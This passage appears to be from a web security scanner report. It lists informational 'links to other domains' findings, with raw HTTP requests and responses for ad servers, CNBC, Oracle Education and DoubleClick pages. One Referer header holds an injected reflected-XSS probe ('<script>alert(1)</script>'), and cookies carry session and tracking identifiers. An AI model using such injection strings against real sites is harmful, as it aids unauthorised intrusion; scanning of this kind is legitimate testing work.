Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Tue, 06 Sep 2011 15:38:50 GMT
Date: Tue, 06 Sep 2011 15:36:31 GMT
Content-Length: 1869
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;


               
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }


document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg="></iframe>
...[SNIP]...

19.45. http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /lar/v11-001/d7/jsc/flr.js

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /lar/v11-001/d7/jsc/flr.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=&z=0224774881 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1ea7ed1-4fbc-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=420
Date: Tue, 06 Sep 2011 15:15:56 GMT
Content-Length: 1867
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;


               
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }


document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg="></iframe>
...[SNIP]...

19.46. http://data.cnbc.com/quotes/CN

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/CN

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /quotes/CN;SHI HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:27 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109980
X-Aicache-OS: 64.210.193.97:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
       <script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
<div class="fL w655" style="margin-right:5px;">    
                                       
                                                           
                                                                                                                   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="1" height="1" id="flashQuoteProxy" align="middle">
                                                   <param name="allowScriptAccess" value="always">
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<a href="/id/44345379"><img align="left" border="0" vspace="0" hspace="0" class="mB5 mR10 Dot_CNBC_boxIMG" src="http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/batmobile_93.jpg"></a>
...[SNIP]...
<a href="/id/44344096"><img align="left" border="0" vspace="0" hspace="0" class="mB5 mR10 Dot_CNBC_boxIMG" src="http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/roofer_93.jpg"></a>
...[SNIP]...
<a href="/id/44347217"><img align="left" border="0" vspace="0" hspace="0" class="mB5 mR10 Dot_CNBC_boxIMG" src="http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/suburb_93.jpg"></a>
...[SNIP]...
<div class="cnbc_submenutitle">
<a style="color: rgb(255, 255, 255); text-decoration: none; margin-top: 3px; margin-left: -5px;"
class="cnbc_submenutitle" onmouseover="this.style.color='#FFDF0A'" onmouseout="this.style.color='#FFFFFF'"
href="http://www.nbcuniversalstore.com/index.php?v=cnbc_original-productions">
DVDs</a>
...[SNIP]...
<div class="cnbc_submenutitle">
<a style="color: rgb(255, 255, 255); text-decoration: none; margin-top: 3px; margin-left: -5px;"
class="cnbc_submenutitle" onmouseover="this.style.color='#FFDF0A'" onmouseout="this.style.color='#FFFFFF'"
href="http://www.nbcuniversalstore.com/?v=cnbc">
Merchandise</a>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

19.47. http://data.cnbc.com/quotes/CN

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/CN

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /quotes/CN;SHI/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:26 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109298
X-Aicache-OS: 64.210.194.245:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
<div class="fL w655" style="margin-right:5px;">    
                                       
                                                           
                                                                                                                   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="1" height="1" id="flashQuoteProxy" align="middle">
                                                   <param name="allowScriptAccess" value="always">
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<a href="/id/44345379"><img align="left" border="0" vspace="0" hspace="0" class="mB5 mR10 Dot_CNBC_boxIMG" src="http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/batmobile_93.jpg"></a>
...[SNIP]...
<a href="/id/44344096"><img align="left" border="0" vspace="0" hspace="0" class="mB5 mR10 Dot_CNBC_boxIMG" src="http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/roofer_93.jpg"></a>
...[SNIP]...
<a href="/id/44347217"><img align="left" border="0" vspace="0" hspace="0" class="mB5 mR10 Dot_CNBC_boxIMG" src="http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/suburb_93.jpg"></a>
...[SNIP]...
<div class="cnbc_submenutitle">
<a style="color: rgb(255, 255, 255); text-decoration: none; margin-top: 3px; margin-left: -5px;"
class="cnbc_submenutitle" onmouseover="this.style.color='#FFDF0A'" onmouseout="this.style.color='#FFFFFF'"
href="http://www.nbcuniversalstore.com/index.php?v=cnbc_original-productions">
DVDs</a>
...[SNIP]...
<div class="cnbc_submenutitle">
<a style="color: rgb(255, 255, 255); text-decoration: none; margin-top: 3px; margin-left: -5px;"
class="cnbc_submenutitle" onmouseover="this.style.color='#FFDF0A'" onmouseout="this.style.color='#FFFFFF'"
href="http://www.nbcuniversalstore.com/?v=cnbc">
Merchandise</a>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/stage/global.js" language="JavaScript"></script>
...[SNIP]...

19.48. http://data.cnbc.com/quotes/HK

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/HK

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /quotes/HK;HSI/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:23 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109239
X-Aicache-OS: 64.210.194.245:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
<div class="fL w655" style="margin-right:5px;">    
                                       
                                                           
                                                                                                                   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="1" height="1" id="flashQuoteProxy" align="middle">
                                                   <param name="allowScriptAccess" value="always">
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<a href="/id/44345379"><img align="left" border="0" vspace="0" hspace="0" class="mB5 mR10 Dot_CNBC_boxIMG" src="http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/batmobile_93.jpg"></a>
...[SNIP]...
<a href="/id/44344096"><img align="left" border="0" vspace="0" hspace="0" class="mB5 mR10 Dot_CNBC_boxIMG" src="http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/roofer_93.jpg"></a>
...[SNIP]...
<a href="/id/44347217"><img align="left" border="0" vspace="0" hspace="0" class="mB5 mR10 Dot_CNBC_boxIMG" src="http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/suburb_93.jpg"></a>
...[SNIP]...
<div class="cnbc_submenutitle">
<a style="color: rgb(255, 255, 255); text-decoration: none; margin-top: 3px; margin-left: -5px;"
class="cnbc_submenutitle" onmouseover="this.style.color='#FFDF0A'" onmouseout="this.style.color='#FFFFFF'"
href="http://www.nbcuniversalstore.com/index.php?v=cnbc_original-productions">
DVDs</a>
...[SNIP]...
<div class="cnbc_submenutitle">
<a style="color: rgb(255, 255, 255); text-decoration: none; margin-top: 3px; margin-left: -5px;"
class="cnbc_submenutitle" onmouseover="this.style.color='#FFDF0A'" onmouseout="this.style.color='#FFFFFF'"
href="http://www.nbcuniversalstore.com/?v=cnbc">
Merchandise</a>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/stage/global.js" language="JavaScript"></script>
...[SNIP]...

19.49. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/db_pages.getpage

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /pls/web_prod-plq-dad/db_pages.getpage?page_id=501 HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/searchResult.searchEngineParser
Cookie: SearchParams-cookie=%3CSearchParams%20type%3D%22SearchParams%22%3E%0A%20%20%20%3Ckeyword%20type%3D%22string%22%3Exss%3C/keyword%3E%0A%20%20%20%3Cstart_month%20type%3D%22string%22%3E%3C/start_month%3E%0A%20%20%20%3Cstart_year%20type%3D%22string%22%3E%3C/start_year%3E%0A%20%20%20%3Cend_month%20type%3D%22string%22%3E%3C/end_month%3E%0A%20%20%20%3Cend_year%20type%3D%22string%22%3E%3C/end_year%3E%0A%20%20%20%3Cfrom_date%20type%3D%22string%22%3E%3C/from_date%3E%0A%20%20%20%3Cto_date%20type%3D%22string%22%3E%3C/to_date%3E%0A%20%20%20%3Ccountries%20type%3D%22string%22%3E1001%3C/countries%3E%0A%20%20%20%3Cslocation%20type%3D%22string%22%3E%3C/slocation%3E%0A%20%20%20%3Ccategory_id%20type%3D%22string%22%3E%3C/category_id%3E%0A%20%20%20%3Cformat%20type%3D%22string%22%3E%3C/format%3E%0A%20%20%20%3CmaterialLang%20type%3D%22string%22%3E%3C/materialLang%3E%0A%20%20%20%3CspokenLang%20type%3D%22string%22%3E%3C/spokenLang%3E%0A%20%20%20%3CadvancedSearch%20type%3D%22string%22%3EY%3C/advancedSearch%3E%0A%20%20%20%3CforceExpSearch%20type%3D%22string%22%3E%3C/forceExpSearch%3E%0A%20%20%20%3CcopyObject%20type%3D%22Function%22%3E%0A%3C%21%5BCDATA%5Bfunction%20copyObject%28_obj%29%20%7B%0A%20%20%20%20this.keyword%20%3D%20_obj.keyword%3B%0A%20%20%20%20this.category_id%20%3D%20_obj.category_id%3B%0A%20%20%20%20this.format%20%3D%20_obj.format%3B%0A%20%20%20%20this.start_month%20%3D%20_obj.start_month%3B%0A%20%20%20%20this.start_year%20%3D%20_obj.start_year%3B%0A%20%20%20%20this.end_month%20%3D%20_obj.end_month%3B%0A%20%20%20%20this.end_year%20%3D%20_obj.end_year%3B%0A%20%20%20%20this.slocation%20%3D%20_obj.slocation%3B%0A%20%20%20%20this.countries%20%3D%20_obj.countries%3B%0A%20%20%20%20this.materialLang%20%3D%20_obj.materialLang%3B%0A%20%20%20%20this.forceExpSearch%20%3D%20_obj.forceExpSearch%3B%0A%20%20%20%20this.advancedSearch%20%3D%20_obj.advancedSearch%3B%0A%7D%5D%5D%3E%20%20%20%3C/copyObject%3E%0A%3C/SearchParams%3E%0A; BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Length: 55536
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=144115409687157544,0)
Date: Tue, 06 Sep 2011 16:02:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<td valign="top" align="center">
                   <a href="https://global-ebusiness.oraclecorp.com/OA_HTML/RF.jsp?function_id=1174607&resp_id=-1&resp_appl_id=-1&security_group_id=0&lang_code=US&params=5o2QgS9hDwCYOTRqCX6vVj51kgORxPc5zlyw7Cc3QpWNnoAhsc5vZ5ZDX6d7IsLTFIYjfvuOEhKl6z1hsRi9ww" target="_blank">
                       <img src="http://education.oracle.com/images/employee_cart_icon.gif" WIDTH="18" HEIGHT="18" border="0" ALT="Employees">
...[SNIP]...

19.50. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main

Summary

Severity:   Information
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/webreg_course_index.main

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e2 HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
Content-Length: 18800
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=144115289428037548,0)
Date: Tue, 06 Sep 2011 16:01:39 GMT

<!--*09:01:40*-->
<HTML><HEAD>
<TITLE>SSCD - Course Index</TITLE>
<LINK REL=stylesheet type="text/css" HREF="/admin/oracle.css">
<STYLE>
                   TD.selected    {BACKGROUND-COLOR: #CCCC99}
                   TD.nonSelec
...[SNIP]...
<td width="10">
   <img src="http://oracleimg.com/admin/images/stretch.gif" width="10" alt="">
   </td>
...[SNIP]...

19.51. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /activityi;src=3267000;type=homep770;cat=homep781;ord=1;num=6780372345820.069? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bigcommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 06 Sep 2011 15:34:46 GMT
Expires: Tue, 06 Sep 2011 15:34:46 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 559
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://secure.leadback.advertising.com/adcedge/lb?site=695501&betr=bigcommerce_cs=[+]1[720],3[8760]" width="1" height="1" border="0"><script type="text/javascript" src="https://js.revsci.net/gateway/gw.js?csid=I10981&rtid=10158&auto=t"></script><script type="text/javascript" src="https://cts.w55c.net/ct/ct-4947e18d0acd4b329511c553466a8980.js"></script>
...[SNIP]...

19.52. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /activityi;src=1917245;type=cscro065;cat=cscho154;ord=4762175416108.221? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.csc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 06 Sep 2011 15:57:43 GMT
Expires: Tue, 06 Sep 2011 15:57:43 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 1151
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Start of Double
...[SNIP]...
<!-- End of DoubleClick Spotlight Tag: Please do not remove--><img src='http://a.tribalfusion.com/i.cid?c=271753&d=30&page=landingPage' width='1' height='1' border='0'><img src="https://secure.leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=compsci_cs=1&betq=8029=399959" width = "1" height = "1" border = "0"></body>
...[SNIP]...

19.53. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071435827/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1071435827/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /pagead/viewthroughconversion/1071435827/?random=1315341856992&cv=6&fst=1315341856992&num=1&fmt=1&value=0&label=KhpeCOWsqgEQs6Dz_gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//www.netsuite.com/portal/home.shtml&url=http%3A//www.netsuite.com/portal/products/netsuite/financials/main.shtml&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/netsuite/financials/main.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 06 Sep 2011 15:44:18 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 378
X-XSS-Protection: 1; mode=block

<html><body bgcolor="#666666" link="#FFFFFF" alink="#FFFFFF" vlink="#FFFFFF" leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><center><font style="font-size:11px" face="arial,sans-serif" color="#FFFFFF">Google Site Stats - <a href="https://services.google.com/sitestats/en.html?cid=1071435827" target="_blank">learn more</a>
...[SNIP]...

19.54. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netsuite-www.baynote.net
Path:   /baynote/tags2/guide/results-products/netsuite-www

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /baynote/tags2/guide/results-products/netsuite-www?userId=6923713758307492964&customerId=netsuite&code=www&id=0&guide=ContentGuide&resultsPerPage=5&referrer=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml&url=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Ffinancials%2Fmain.shtml&appendParams=&rankParam=&condition=d%26g%26s&v=1 HTTP/1.1
Host: netsuite-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/netsuite/financials/main.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:44:15 GMT
Content-Length: 3780


bnTagManager.getTag(0).results = "<div class='bn_g_container' id='bn_guidecontainer0'><div class='bn_g_area' id='bn_guidearea0'><div class='bn_g_welcome' id='bn_guidewelcome0
...[SNIP]...
